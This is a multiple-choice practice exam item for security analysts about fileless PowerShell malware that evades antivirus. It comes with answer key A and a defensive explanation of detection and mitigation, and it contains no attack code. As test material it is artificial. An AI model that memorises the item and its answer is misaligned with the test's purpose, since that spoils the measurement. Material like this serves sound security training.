A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IPs. Antivirus scans detect no malicious files. Which of the following BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

 Fileless malware operates primarily in memory, leveraging legitimate system tools such as PowerShell, WMI, or Office macros. Obfuscated scripts communicating externally without generating files on disk indicate living-off-the-land (LotL) techniques. These attacks evade traditional signature-based antivirus by executing entirely in memory.

B Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include unusual script execution, outbound connections to unknown IPs, and deviations from baseline system behavior. Mitigation involves isolating endpoints, terminating malicious processes, analyzing scripts, and performing system remediation.

C Preventive controls include enforcing least privilege, PowerShell script logging, application whitelisting, script block logging, execution policies, and integration with threat intelligence to block malicious domains. Defense-in-depth strategies combining anomaly detection, monitoring, and user awareness are critical to detecting and remediating fileless malware.

D Ransomware, phishing, and DDoS attacks do not exhibit memory-resident, obfuscated, script-driven behavior without creating traditional files.